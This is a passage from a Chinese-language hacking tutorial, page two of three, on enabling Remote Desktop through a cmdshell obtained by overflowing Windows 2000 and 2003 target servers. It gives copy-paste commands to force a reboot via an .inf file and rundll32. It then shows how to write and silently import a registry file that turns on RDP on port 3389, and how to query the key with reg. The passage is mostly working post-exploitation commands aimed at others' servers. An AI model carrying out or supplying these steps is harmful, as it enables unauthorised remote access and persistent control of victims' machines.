浅谈CMD下开启远程服务

然后需要做的事就是重启了，如何使目标服务器重启呢？和朋友多方测试后，觉得用下面这个方法比较妥当。在cmdshell下执行如下代码：

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%\{out}.inf

按顺序将以上五行代码一行一行地复制到cmdshell上，复制完一行按一次回车执行，五行都执行完毕后，服务器就会重启的了。至于原理什么的我就不废话了。当然了，让服务器重启的方法比较多，比如结束掉系统关键进程、代码模拟按键等都是可以的，不过个人认为上面推荐的这个方法比较保险！如无意外，等待服务器完成重启之后再连接目标发现远程桌面服务已经成功开启了，如图4。

至此Windows 2000操作系统溢出后返回的cmdshell下开启远程桌面服务就成功完成了。

2、2003系统

     相对于2000的系统来说，2003cmdshell下开启远程桌面服务就比较容易一些了，起码无需重启嘛！第一种方法也是用"echo"命令写入一个3389.reg文件，再"regedit /s 3389.reg"导入注册表文件即可开启，比较简单，与上面介绍的2000的开启方法类似。将如下代码一行一行地复制到cmdshell窗口后按回车执行：

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

完成以上操作后再执行"regedit /s 3389.reg"导入即可生效！不过这个方法相对来说比较麻烦，也比较复杂一些。我们还可以用另外一种比较简单的方法来开启远程桌面服务的，嘿嘿。在介绍另一个操作方法之前，我们先来熟悉下2003系统
下远程桌面服务的一个最关键的注册表键值。在"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
下数值名称为"fDenyTSConnections"的这一项，可以看到它的数值数据为1或0。数值为1的时候关闭远程桌面服务，数值为0的时候开启远程桌面服务。换句话说，我们只要可以在cmdshell下更改这个关键的注册表键值数据就可以达到实现开启远程桌面服务的目的了！有幸的是，在2003下有一个"reg"命令完全可以做到这一点，嘿嘿。这里我们找一台操作系统为2003的服务器，通过和上面介绍的同样方法溢出后返回一个cmdshell，如图5。

当我们尝试连接的时候会发现根本无法连接上去，如图6。

下面详细说明一下用"reg"命令开启远程桌面服务。执行：

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

我们发现"fDenyTSConnections"键值数据为"0x1"，如图7。

这个是十六进制数的1。上面提到，数据为1则没有开启远程桌面服务。

上一页  [1] [2] [3] 下一页